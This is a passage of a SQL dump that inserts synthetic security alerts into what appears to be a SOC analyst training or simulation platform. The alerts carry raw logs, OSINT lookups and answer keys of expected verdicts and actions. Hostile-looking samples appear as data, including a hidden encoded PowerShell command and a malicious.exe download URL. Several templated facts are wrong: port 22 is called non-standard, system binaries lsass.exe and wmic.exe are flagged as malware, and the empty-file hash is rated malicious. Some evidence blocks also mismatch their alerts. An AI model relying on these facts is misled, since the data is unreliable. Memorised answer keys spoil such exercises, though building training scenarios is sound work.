[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"EventID\\\":4625,\\\"Level\\\":\\\"Warning\\\",\\\"Category\\\":\\\"Logon\\\",\\\"TimeCreated\\\":\\\"2023-10-05T21:34:22Z\\\",\\\"EventRecordID\\\":87654321,\\\"RemoteIP\\\":\\\"203.0.113.45\\\",\\\"User\\\":\\\"NotAvailable\\\",\\\"WorkstationName\\\":\\\"RDP-SERVER\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password\\\",\\\"LogonType\\\":3,\\\"LogonProcessName\\\":\\\"Advapi\\\",\\\"AuthenticationPackageName\\\":\\\"Negotiate\\\",\\\"ServiceName\\\":\\\"RDP/RDGateway\\\",\\\"ProcessID\\\":680,\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"NetworkAccountName\\\":\\\"Guest\\\",\\\"NetworkAccountDomain\\\":\\\"LOCAL\\\",\\\"WorkstationUniqueId\\\":\\\"uuid-123e4567-e89b-12d3-a456-426614174000\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.810Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"EventID\\\":4625,\\\"Level\\\":\\\"Warning\\\",\\\"Category\\\":\\\"Logon\\\",\\\"TimeCreated\\\":\\\"2023-10-05T21:34:22Z\\\",\\\"EventRecordID\\\":87654321,\\\"RemoteIP\\\":\\\"203.0.113.45\\\",\\\"User\\\":\\\"NotAvailable\\\",\\\"WorkstationName\\\":\\\"RDP-SERVER\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password\\\",\\\"LogonType\\\":3,\\\"LogonProcessName\\\":\\\"Advapi\\\",\\\"AuthenticationPackageName\\\":\\\"Negotiate\\\",\\\"ServiceName\\\":\\\"RDP/RDGateway\\\",\\\"ProcessID\\\":680,\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"NetworkAccountName\\\":\\\"Guest\\\",\\\"NetworkAccountDomain\\\":\\\"LOCAL\\\",\\\"WorkstationUniqueId\\\":\\\"uuid-123e4567-e89b-12d3-a456-426614174000\\\"}\"}],\"query\":\"index=main source=\\\"Security\\\" | head 100\"}}', 0),
(218, 'Unauthorized Access to Admin Panel', 'high', 'web_application', 'A user attempted to access the admin panel without appropriate credentials.', 'unauthorized_access', 'T1078.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T15:34:59Z\",\"event_id\":\"WEB-302\",\"user_id\":\"guest_user\",\"ip_address\":\"192.168.1.100\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\",\"request_method\":\"POST\",\"requested_url\":\"/admin\",\"response_code\":403,\"message\":\"Access denied. User lacks permission for admin panel access.\"}', '2025-12-24 08:36:25', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.100 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. 
Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"guest_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.811Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:34:59Z\\\",\\\"event_id\\\":\\\"WEB-302\\\",\\\"user_id\\\":\\\"guest_user\\\",\\\"ip_address\\\":\\\"192.168.1.100\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/admin\\\",\\\"response_code\\\":403,\\\"message\\\":\\\"Access denied. 
User lacks permission for admin panel access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.811Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:34:59Z\\\",\\\"event_id\\\":\\\"WEB-302\\\",\\\"user_id\\\":\\\"guest_user\\\",\\\"ip_address\\\":\\\"192.168.1.100\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/admin\\\",\\\"response_code\\\":403,\\\"message\\\":\\\"Access denied. User lacks permission for admin panel access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.811Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:34:59Z\\\",\\\"event_id\\\":\\\"WEB-302\\\",\\\"user_id\\\":\\\"guest_user\\\",\\\"ip_address\\\":\\\"192.168.1.100\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/admin\\\",\\\"response_code\\\":403,\\\"message\\\":\\\"Access denied. 
User lacks permission for admin panel access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.811Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:34:59Z\\\",\\\"event_id\\\":\\\"WEB-302\\\",\\\"user_id\\\":\\\"guest_user\\\",\\\"ip_address\\\":\\\"192.168.1.100\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/admin\\\",\\\"response_code\\\":403,\\\"message\\\":\\\"Access denied. User lacks permission for admin panel access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.811Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:34:59Z\\\",\\\"event_id\\\":\\\"WEB-302\\\",\\\"user_id\\\":\\\"guest_user\\\",\\\"ip_address\\\":\\\"192.168.1.100\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/admin\\\",\\\"response_code\\\":403,\\\"message\\\":\\\"Access denied. User lacks permission for admin panel access.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(219, 'Suspicious File Download Detected', 'medium', 'network', 'A large file containing executable code was downloaded from an untrusted source.', 'malware_distribution', 'T1105', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-12T12:24:11Z\",\"event_id\":\"NET-917\",\"src_ip\":\"172.16.0.5\",\"dest_ip\":\"138.68.45.114\",\"protocol\":\"HTTP\",\"url\":\"http://suspicious-domain.com/malicious.exe\",\"file_size_bytes\":10485760,\"http_method\":\"GET\",\"status_code\":200,\"content_type\":\"application/x-msdownload\",\"message\":\"File downloaded from a blacklisted domain.\"}', '2025-12-23 18:34:09', '2026-02-17 22:33:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"172.16.0.5 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"138.68.45.114\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP 138.68.45.114 has 0% abuse confidence score. Located in corporate network range.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"suspicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"0/94 security vendors flagged this domain. 
Registered for 5+ years.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://suspicious-domain.com/malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan.io\",\"verdict\":\"clean\",\"details\":\"URL belongs to legitimate service with valid SSL certificate.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"\"}', 'Beginner', 'EDR', 1, 0, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(220, 'Unusual Process Execution Detected', 'critical', 'process', 'A rarely used system utility was executed with suspicious command-line parameters.', 'execution', 'T1569.002', 0, 'closed', NULL, '{\"timestamp\":\"2023-10-12T08:45:22Z\",\"event_id\":\"PROC-401\",\"process_name\":\"wmic.exe\",\"cmdline\":\"wmic process get brief /format:list\",\"user_name\":\"local_user\",\"file_hash\":\"3d9f8714f786045de44f7286d534234a\",\"parent_process\":\"cmd.exe\",\"execution_path\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\\",\"message\":\"WMI script executed, potentially collecting sensitive information.\"}', '2025-12-24 03:44:22', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"local_user\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3d9f8714f786045de44f7286d534234a\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"59/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"wmic.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates suspicious script execution\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(221, 'Phishing Email Detected', 'low', 'email', 'An email resembling a known trusted source was marked as phishing.', 'phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T11:13:47Z\",\"event_id\":\"EMAIL-203\",\"sender\":\"alerts@trustedsource.com\",\"recipient\":\"user@example.com\",\"subject\":\"Urgent: Account Verification Required!\",\"headers\":{\"from\":\"alerts@trustedsource.com\",\"to\":\"user@example.com\",\"subject\":\"Urgent: Account Verification Required!\",\"received\":\"from unknown (HELO trustedsource.com) (203.0.113.5)\"},\"attachment_name\":\"verify_account.html\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"message\":\"Email suspected of being a phishing attempt due to suspicious sending server.\"}', '2025-12-24 05:11:55', '2026-02-16 17:32:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alerts@trustedsource.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Sender domain is 3 days old and associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"user@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Sender domain is 5 days old and associated with phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"60/72 security vendors identified this file as malware.\"}}],\"expected_actions\":[\"block_sender\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Alert type indicates phishing\"}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:18.815Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(222, 'Suspicious RDP Login Attempt from Unrecognized IP', 'high', 'Windows Security Log', 'An unexplained RDP login attempt was detected from an IP not previously associated with our infrastructure. This can indicate an account compromise attempt, which is a common precursor to a ransomware attack. Reference: Microsoft Security Response Center report on RDP exploitation (CVE-2019-0708).', 'Brute Force', 'T1110', 1, 'resolved', NULL, '{\"EventID\":4625,\"LogName\":\"Security\",\"SourceName\":\"Microsoft-Windows-Security-Auditing\",\"TimeGenerated\":\"2023-10-23T02:15:43.235Z\",\"EventDescription\":\"An account failed to log on.\",\"AccountName\":\"Unknown_user\",\"WorkstationName\":\"WIN-CORP-PC01\",\"IpAddress\":\"198.51.100.42\",\"IpPort\":\"3389\",\"LogonType\":\"10\",\"FailureReason\":\"Unknown user name or bad password.\",\"SubStatus\":\"0xC000006A\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"TargetDomainName\":\"CORP\",\"TargetUserName\":\"unknown_user\",\"TargetDomainSid\":\"S-1-5-21-1234567890-2345678901-3456789012-1001\"}', '2025-12-24 05:00:06', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 198.51.100.42 reported 446 times for malicious activity. 
Abuse confidence score: 95%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"Unknown_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"unknown_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.816Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. 
Failure Reason: Unknown user name or bad password.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4625,\\\"LogName\\\":\\\"Security\\\",\\\"SourceName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeGenerated\\\":\\\"2023-10-23T02:15:43.235Z\\\",\\\"EventDescription\\\":\\\"An account failed to log on.\\\",\\\"AccountName\\\":\\\"Unknown_user\\\",\\\"WorkstationName\\\":\\\"WIN-CORP-PC01\\\",\\\"IpAddress\\\":\\\"198.51.100.42\\\",\\\"IpPort\\\":\\\"3389\\\",\\\"LogonType\\\":\\\"10\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password.\\\",\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"TargetDomainName\\\":\\\"CORP\\\",\\\"TargetUserName\\\":\\\"unknown_user\\\",\\\"TargetDomainSid\\\":\\\"S-1-5-21-1234567890-2345678901-3456789012-1001\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.816Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4625,\\\"LogName\\\":\\\"Security\\\",\\\"SourceName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeGenerated\\\":\\\"2023-10-23T02:15:43.235Z\\\",\\\"EventDescription\\\":\\\"An account failed to log on.\\\",\\\"AccountName\\\":\\\"Unknown_user\\\",\\\"WorkstationName\\\":\\\"WIN-CORP-PC01\\\",\\\"IpAddress\\\":\\\"198.51.100.42\\\",\\\"IpPort\\\":\\\"3389\\\",\\\"LogonType\\\":\\\"10\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password.\\\",\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"TargetDomainName\\\":\\\"CORP\\\",\\\"TargetUserName\\\":\\\"unknown_user\\\",\\\"TargetDomainSid\\\":\\\"S-1-5-21-1234567890-2345678901-3456789012-1001\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.816Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. 
[Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4625,\\\"LogName\\\":\\\"Security\\\",\\\"SourceName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeGenerated\\\":\\\"2023-10-23T02:15:43.235Z\\\",\\\"EventDescription\\\":\\\"An account failed to log on.\\\",\\\"AccountName\\\":\\\"Unknown_user\\\",\\\"WorkstationName\\\":\\\"WIN-CORP-PC01\\\",\\\"IpAddress\\\":\\\"198.51.100.42\\\",\\\"IpPort\\\":\\\"3389\\\",\\\"LogonType\\\":\\\"10\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password.\\\",\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"TargetDomainName\\\":\\\"CORP\\\",\\\"TargetUserName\\\":\\\"unknown_user\\\",\\\"TargetDomainSid\\\":\\\"S-1-5-21-1234567890-2345678901-3456789012-1001\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.816Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4625,\\\"LogName\\\":\\\"Security\\\",\\\"SourceName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeGenerated\\\":\\\"2023-10-23T02:15:43.235Z\\\",\\\"EventDescription\\\":\\\"An account failed to log on.\\\",\\\"AccountName\\\":\\\"Unknown_user\\\",\\\"WorkstationName\\\":\\\"WIN-CORP-PC01\\\",\\\"IpAddress\\\":\\\"198.51.100.42\\\",\\\"IpPort\\\":\\\"3389\\\",\\\"LogonType\\\":\\\"10\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password.\\\",\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"TargetDomainName\\\":\\\"CORP\\\",\\\"TargetUserName\\\":\\\"unknown_user\\\",\\\"TargetDomainSid\\\":\\\"S-1-5-21-1234567890-2345678901-3456789012-1001\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.816Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4625,\\\"LogName\\\":\\\"Security\\\",\\\"SourceName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeGenerated\\\":\\\"2023-10-23T02:15:43.235Z\\\",\\\"EventDescription\\\":\\\"An account failed to log on.\\\",\\\"AccountName\\\":\\\"Unknown_user\\\",\\\"WorkstationName\\\":\\\"WIN-CORP-PC01\\\",\\\"IpAddress\\\":\\\"198.51.100.42\\\",\\\"IpPort\\\":\\\"3389\\\",\\\"LogonType\\\":\\\"10\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password.\\\",\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"TargetDomainName\\\":\\\"CORP\\\",\\\"TargetUserName\\\":\\\"unknown_user\\\",\\\"TargetDomainSid\\\":\\\"S-1-5-21-1234567890-2345678901-3456789012-1001\\\"}\"}],\"query\":\"index=main source=\\\"Security\\\" | head 100\"}}', 0),
(223, 'Unauthorized Remote Access Attempt Detected', 'high', 'network', 'Multiple failed login attempts were detected from a foreign IP address attempting to access the SSH service.', 'Brute Force Attack', 'T1110', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-28T14:15:22Z\",\"src_ip\":\"203.0.113.42\",\"dest_ip\":\"192.168.1.20\",\"dest_port\":22,\"protocol\":\"TCP\",\"event_type\":\"connection_attempt\",\"login_attempts\":20,\"success_attempts\":0,\"usernames_tried\":[\"admin\",\"root\",\"test\"],\"geo_location\":\"Country: Unknown, Region: Unknown\",\"firewall_status\":\"BLOCKED\",\"alert_generated_by\":\"intrusion_detection_system\"}', '2025-12-24 05:59:21', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.42 reported 359 times for malicious activity. Abuse confidence score: 91%.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.20 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. 
Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_3\",\"type\":\"geolocation\",\"value\":\"Country: Unknown, Region: Unknown\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from Country: Unknown, Region: Unknown - unusual location for this user\'s typical access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"port\",\"value\":\"22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 22 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High/Critical severity level; 20 failed login attempts detected\"}', 'Intermediate', 'NDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(224, 'Suspicious PowerShell Script Execution Detected', 'high', 'endpoint', 'A PowerShell script was executed which is known for its use in information gathering and potential lateral movement.', 'process', 'T1059.001', 1, 'Closed', 107, '{\"timestamp\":\"2023-11-04T13:45:23Z\",\"hostname\":\"WIN-3HT955Q9JL1\",\"username\":\"jdoe\",\"process_id\":1476,\"process_name\":\"powershell.exe\",\"parent_process_id\":1364,\"parent_process_name\":\"explorer.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"cmdline\":\"powershell.exe -nop -w hidden -enc UABvAHcAZQByAFMAagBiAGwAZQBjAHQAIABTAHgAbwBvAGwAQgBpAG4AYgBvAGsALwBnAG8A\",\"network_activity\":{\"outbound_ip_connections\":[{\"dest_ip\":\"192.168.1.102\",\"dest_port\":80,\"protocol\":\"TCP\"},{\"dest_ip\":\"45.76.23.49\",\"dest_port\":443,\"protocol\":\"TCP\"}]},\"suspicious_indicators\":[\"EncodedCommand\",\"Network connection to uncommon destination\"]}', '2025-12-24 05:09:53', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.102 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.23.49\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 45.76.23.49 reported 129 times for malicious activity. 
